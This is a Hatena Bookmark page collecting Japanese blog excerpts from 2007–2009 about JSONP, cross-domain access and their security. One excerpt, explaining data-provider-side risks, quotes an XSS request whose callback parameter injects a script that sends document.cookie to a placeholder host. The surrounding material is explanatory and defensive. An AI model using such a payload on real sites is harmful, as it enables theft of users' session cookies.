[B! JSONP] TAKESAKOのブックマーク

新はてなブックマーク件数取得 API を使って自分のページに件数を埋め込む最も簡単な方法 - IT戦記

はてなブックマークから新しい件数取得 API が提供されているようです！ (開発者さま向け)はてなブックマーク件数取得APIに新しいAPIを追加 - はてなブックマーク日記 - 機能変更、お知らせなどこの API のいいところは JSONP に対応しているところでしょうね！すばらしい！というわけで、 HTML だけで、件数を埋め込む例を書いてみたよ！やり方は簡単 callback パラメータに document.writeを指定するだけ！ <script src="http://api.b.st-hatena.com/entry.count?url=http%3A%2F%2Fwww.example.com%2F&callback=document.write"></script>件のブックマークがあります。あとは、適当にリンクとか張って <a href="http://b.ha

TAKESAKO 2009/08/11

リンク

［気になる］JSONPの守り方

XSSにCSRFにSQLインジェクションにディレクトリトラバーサル……Webアプリケーションのプログラマが知っておくべき脆弱性はいっぱいあります。そこで本連載では、そのようなメジャーなもの“以外”も掘り下げていきます︵編集部︶ JSONPだって、セキュリティを気にしてほしい皆さんこんにちは、はせがわようすけです。今回は、JSONPを使用する場合のセキュリティについて解説しましょう。 JSONPとは、JSON with Paddingの名称が示しているとおり、JSON形式のデータにコールバック関数の呼び出しのためのコードを付加することで、クロスドメインでデータの受け渡しを実現するためのデータ形式です。JavaScriptからクロスドメインでのデータが簡単に扱えることなどを理由に、多数のWebアプリケーションでAPIの一部としてJSONP形式でデータの提供が行われています。具体的な例を見

TAKESAKO 2009/08/10

リンク

Ajax - tips - JSONPをブラウザにキャッシュさせない : 404 Blog Not Found

2009年04月13日12:00 カテゴリTips Ajax - tips - JSONPをブラウザにキャッシュさせないというわけで、添削おじさん登場。 [を] 笑い顔顔文字APIを作りました︵なお、なぜかIEと Safari だと一回しか動きません。添削希望！︶理由は単純で、IEとSafariはJSONPをキャッシュしてしまうのです。理由がわかれば、解決法も簡単です。たとえば以下のようにしてURIをUniqueにしちゃえばOK. function WarosuJSON(cb){ this.proxy = 'http://mimitako.net/api/warosuapi.cgi'; this.cb = cb; this.count = 0; this.parse = function(cb){ var script = document.createElement('scri

TAKESAKO 2009/04/13

ajax
JSONP

リンク

Afrous プラットフォームサービスをリリースしました、番外編 - snippets from shinichitomita’s journal

昔懐かしのAfrousですが、まだ実はやってます。というかうちの会社のメインプロダクトです。だいぶブランド名として使いまわしてる感はありますが。ということで、本日リニューアルオープンしました。 HugeDomains.com - Shop for over 300,000 Premium Domains 基本的に会社関連の話は会社の方でやるべきだと思うので（市場性とかうんぬん）、ここではそれはおいておいて、中身にどういう要素を使ってるかというところを書きます。まずは基本的なところ。 Ext JS ライブラリにはExt JSつかってます。これは見た目ですぐわかりそうなところで、前からそうだったんで言う必要もないところですけど、1.1.1ベースだったのを2.1に変えました（ほぼ書き直し）。こういったお仕着せのUIについていやがる人もいるかもしれませんが、まあ実装側としてはこれがあって正直か

TAKESAKO 2009/02/04

＞「Afrous では、ブラウザ上でのクロスドメイン通信、そしてクライアントサイドでのマッシュアップを実現することで、このファイアーウォールの壁を取り払いました。」

リンク

Google App Engineの使い道、tiny web service - snippets from shinichitomita’s journal

なんか多少つまらない話になる予定。ブラウザのJavaScriptだけでCSV保存するの、できるといいとおもって、調べたけど、やっぱできないよね。Flashまで入れてもだめそう。Firefoxとか限定ならdataスキームでできそうだけどね。つまり、クロスブラウザ前提なら、何かサーバが必要。普通のWebアプリの開発はサーバプログラムがあるのが前提だからいいんだろうけど、今回はそうじゃない開発をやりたい。何のことはない、CSVの文字列作るとこまではJSでできるから、あとはそれをtext/csvでechoして返してくれるサービスさえあれば終わりだ。そんなサービス、きっと探せばいろいろ落ちていそうだけど、普通に探したら見当たらなかったのと、あったとしてもサービスの継続性に疑問があるので、ちょっと作ってGoogle App Engineにのっけてみた。初python, 初google app en

TAKESAKO 2008/05/02

リンク

2008-04-01

朝ごはんをたべていたら思いついたのでどんなものなのか皆さんに伺ってみたくなりました。 ○クロスドメインアクセス対策例JSON、JSONP、JavaScriptで機密情報を配信する場合、クロスドメインアクセスの対策︵＝クロスドメインアクセスを不可能にする対策︶が必要になります。以下にSea Surfers MLで議論されていた方法を紹介します。 (一部省略 by hoshikuzu) 方法2．while(1)、およびコメントアウト法サーバ側がデータの先頭にwhile(1) {}をつける、または全体をコメントアウトした状態で返し、クライアント側でこれを取り除いてevalする方法です。方法1と考え方としてはほとんど変わりません。while(1)の方法はGMailでも使われています。ここでのコメントアウト法が果たして有効なのかどうか答えを知りたく思います。教えて君になっていますが、まことにすみ

TAKESAKO 2008/04/01

リンク

JPドメインのWhois情報をJSONPで出力

どうも上手くいかないドメインもあるようだ・・・ Contact Information: [公開連絡窓口]などが記載してあるとダメかも

TAKESAKO 2008/03/22

リンク

Twitter の crossdomain.xml 問題について。 - てっく煮ブログ

ついったー足あと帳関連でこんなブログ記事を発見した。今回は twitterのprotectな発言とかsettingからメールアドレスの取得や変更なんかできちゃってたわけで…2008-03-09 - skubotaの日記変更？？間違った情報が広がるとよくないので勝手に補足。この記事には誤解がある。確かに取得はできるけど、変更はできない。実際に試した私が言うんだから間違いない。︵補足︶ためしたのは、ついったー足あとちょうを作ったらへん。今は仕様変わってるかも(?)たぶん、サーバー側でリファラを見て弾いてるんだと思う。SWF からリクエストする場合は、SWF の URL がリファラとしてつくようになっている。リファラをなしにして送ったらうまく行くことも確認した。だから、swf からのクロスドメインアクセスに対しては通用しないであろう。よって、(1)メールアドレスの変更、(2)パスワードリセット

TAKESAKO 2008/03/10

リンク

JSONP-SEについて気になったこと - monjudoh’s diary

川崎有亮さんの静的JSONPファイルなのにコールバック関数名を指定できるJavaScriptのエントリに、凄いけどレスポンスが帰ってくるタイミングしだいではうまく行かないようなこんなはてブコメをつけたんですが、時間がたったら自信がなくなってきたので検証してみました。 JSONP-SEではロードされたJavaScriptが自分自身に対応するsrcipt要素の src属性から「callback=何某」をぶっこ抜きます。ロードされたjavaScriptに対応するscript要素が、必ず、その時点で一番最後のscript要素であるという前提になっていて、この前提が崩れると適切なコールバック関数名を取得できません。なので、処理としては、その時点で一番最後のscript要素のsrc属性をグローバル変数に格納するだけで、レスポンスが帰ってくる時間だけが違う二つのjsファイル(相当のもの)を

TAKESAKO 2008/01/28

各ブラウザにおけるscript srcの並列ロードのタイミングの話

リンク

ウェブリブログ：サービスは終了しました。

「ウェブリブログ」は 2023年1月31日をもちましてサービス提供を終了いたしました。 2004年3月のサービス開始より19年近くもの間、沢山の皆さまにご愛用いただきましたことを心よりお礼申し上げます。今後とも、BIGLOBEをご愛顧賜りますよう、よろしくお願い申し上げます。 ※引っ越し先ブログへのリダイレクトサービスは2024年1月31日で終了いたしました。 BIGLOBEのサービス一覧

TAKESAKO 2008/01/27

リンク

Web 2.0的アプリのセキュリティ：再考「機密情報にJSONPでアクセスするな」｜アークウェブのブログ

SEの進地です。 2007年1月に投稿した﹁Web 2.0的アプリのセキュリティ‥機密情報にJSONPでアクセスするな﹂は多くの方にお読みいただきました。誤りも指摘され、元エントリーに改修を加えましたが、かなり読みづらい状態になってしまっています。また、JSON、JSONPのセキュリティに関する新たな話題もSea Surfers MLで議論されているのを読み、自分自身の認識や理解も変化しているので、このエントリーでもう一度JSON、JSONP︵+JavaScript︶に機密情報を含めることの是非と方策を整理、検討したいと思います。 ○JSON、JSONP、JavaScriptによるデータ提供時にセキュリティ対策上留意すべき特徴 JSON、JSONP、JavaScriptによるデータ提供時に留意すべき特徴としてあるのが、﹁クロスドメインアクセス可能﹂というものです。JSONPだけでなく、JS

TAKESAKO 2007/09/11

リンク

snippets from shinichitomita’s journal - AOL WebAIM APIを注目すべき５つの理由

AOL OpenAuthがすごいとか、JSONPによる認証だとか騒いでたけど、もう去年の11月にAOL Web AIMAPIが公開されていたということについて、なんで気づいてなかったのか。一年近くもこれを正当に評価してこなかったことは、恥ずべきことだ。 Web AIMAPIは、以下の理由で画期的、あるいはちょっとネガティブな側から見れば問題児なAPIである。そして、これからWebサービスAPIを設計／開発する人、およびWebのセキュリティを考える人にとっては、少なくとも現在こういったWebサービスの実装が存在していることについては、ちゃんと注視しておかなければならない。 1. サーバレスでメッセンジャーアプリを構築できるこれがとりあず一番目に重要なポイント。これはAPIリクエストとしてJSONP形式のバインディング(運搬方法)を採用していることによる。サーバレスでアプリが作れることの

TAKESAKO 2007/09/11

リンク

OpenAuthで友達リスト取得 - snippets from shinichitomita’s journal

AOL OpenAuthをJavaScriptで使う方法について。以前ちょっと調べてたことが、ちゃんとドキュメントになってた。 Yahoo! で、実はIDだけじゃなくって、AOLの友達リストも取って来れるという話。こちらにデモが。ソースも上記ドキュメントにダウンロードリンクあり。 http://dev.aol.com/gallery_files/getBL.html 動作としては、まずgetTokenサービスを利用して認証トークンを取得できたら、それを使って友達リストのJSONPサービスを呼び出す。友達リストのJSONPサービスリクエストURLはこんな感じになっている。 http://api.oscar.aol.com/presence/get?f=json&bl=1&k=bs1312tKAjxKsqZY&a=....&c=parsePresence (k: developer key

TAKESAKO 2007/09/08

リンク

第4回　Flash、JSONでのクロスドメインアクセス | gihyo.jp

Flashを用いたクロスドメインアクセス前回までは、クロスドメインアクセスを行うための方法として、リバースProxyを使う方法とJSONPを使う方法を紹介しましたが、どちらの方法も少し変わった方法だったと思います。なにか無理やりのように感じた方もいるのではないでしょうか。今回紹介するFlashを使った方法では前回までの方法とは違い、自然な形でクロスドメインアクセスを行うことができます。 Flashでは、呼び出される側で設定を行うことでクロスドメインアクセスが可能になります。設定といっても非常に簡単で、呼び出される側のWebサーバにcrossdomain.xmlというファイルを設置するだけです。このときのURLは http://www.example.com/crossdomain.xml となります。ファイルの内容は以下のようになります。crossdomain.xmlの内容 <cr

TAKESAKO 2007/08/10

setterメソッドをサポートしているブラウザ Firefox, Safari 3

リンク

Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて

« E4X-XSS 脆弱性について | メイン | ﹁スーパー技術者争奪戦﹂ » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;

TAKESAKO 2007/07/29

リンク

AOLのOpenAuthがチャレンジング過ぎて - snippets from shinichitomita’s journal

AOLのOpenAuthという認証APIがあります。YahooのBBAuthだったり、Google Account Authentication、日本で言うならはてな認証、livedoor Authなどに代表される、最近流行のサービスプロバイダによる認証APIの一種なんだと思います。ただ、少なくともAOL IDを使うことはほぼないから、アナウンスは聞いてもとりあえずスルーしてたのだけど、たまたま仕様を読んでいたらかなりびっくりした。なんと通信経路にJSONPを使って認証トークンをやり取りできてしまう。JSONPはパブリック情報の配信以外に使うな、ってのが常識になりつつあった人たちから見たら、これはたぶん衝撃。でも、これがセキュリティ的にヤバいかっていうと、決してそうではなくって、OpenAuthではいわゆる﹁リファラによるサイト制限﹂を実装しているところがポイント。つまり、JSONPリク

TAKESAKO 2007/07/11

リンク

Twitterのcallback変数名 - snippets from shinichitomita’s journal

TwitterのJSONPがcallback変数名に﹁.﹂︵ピリオド︶を受け付けない。﹁[﹂﹁]﹂も。英数字およびアンダースコアのみ、っぽい。 http://www.twitter.com/statuses/user_timeline/3628361.json?callback=JsonWebServicesStub.responseCallbacks._0&count=1 なんとかしてくれないかなあ、こういう微妙な違い。。。常にグローバルにコールバック関数を直書きしろと言ってるのかしら？ dojoのScriptSrcIOをはじめ、JSONP対応のほとんどのライブラリはグローバルの汚染を嫌って独自オブジェクト内にコールバックを押し込めているので、まったく使えないです。もし意味があってやってるなら、その意味を是非知りたい。

TAKESAKO 2007/04/23

リンク

「拡張子ではなく、内容によってファイルを開くこと」の拡張子は Content-Type ではないことに注意 - 葉っぱ日記

少し前に JSONP が XSS を引き起こすかもしれないという点に関する興味深い記事を奥さんが書かれていました。 Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて JSONP における Padding 部分(だけでなくJSON部分も。4/5追記)に攻撃者が HTML と解釈可能なスクリプトを注入することにより、JSONP なデータを直接IEで開いた場合に HTML と解釈され XSS が発生する、という点について書かれています。ここで、IEが JSONP を HTML と解釈する理由は以下の2点。IEのよく知られた機能﹁拡張子ではなく、内容によってファイルを開くこと﹂により、内容が HTML っぽい場合には、Content-Type: text/javascript が無視され HTML として解釈される。上述の設定が﹁無効﹂に設定

TAKESAKO 2007/04/07

リンク

はてなブックマーク

タグ

関連タグで絞り込む (25)

JSONPに関するTAKESAKOのブックマーク (18)

お知らせ

今週のはてなブックマーク数ランキング（2024年7月第2週）

はてなブックマーク透明性レポート（2024年 2月-2024年4月）

今週のはてなブックマーク数ランキング（2024年7月第1週）

公式Twitter

キーボードショートカット一覧

はてなブックマーク

公式Twitter

はてなのサービス